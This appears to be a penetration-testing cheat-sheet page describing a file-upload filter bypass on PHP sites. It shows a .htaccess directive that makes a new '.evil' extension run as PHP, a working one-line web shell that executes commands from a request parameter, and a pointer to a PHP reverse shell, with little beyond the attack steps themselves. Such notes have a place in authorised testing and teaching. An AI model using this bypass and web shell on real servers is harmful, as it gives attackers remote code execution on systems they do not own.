Skip to content

File Upload bypass (.htaccess)

Bypass description

The upload function prevents users from submitting files with extensions that allow php code execution such as:

[ .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .phar and .inc ]

Check if you can upload .htaccess files. We can take advantage of this to get code execution. More information can be found here onsecurity.io.

The .htaccess file is not an RCE vector by itself, but it allows the creation of new legitimate PHP extensions that are allowed by the web application.

Exploiting .htaccess to add new PHP extension

We create our new .htaccess file which includes a new allowed extension of .evil.

cat .htaccess 
AddType application/x-httpd-php .evil

Upload simple php shell

shell.php.evil

<pre><?php echo shell_exec($_REQUEST["cmd"]) ?></pre>
- remember to about extenstion .evil

Upload php reverse shell

  • https://pentestmonkey.net/tools/web-shells/php-reverse-shell
  • remember to change extenstion to .evil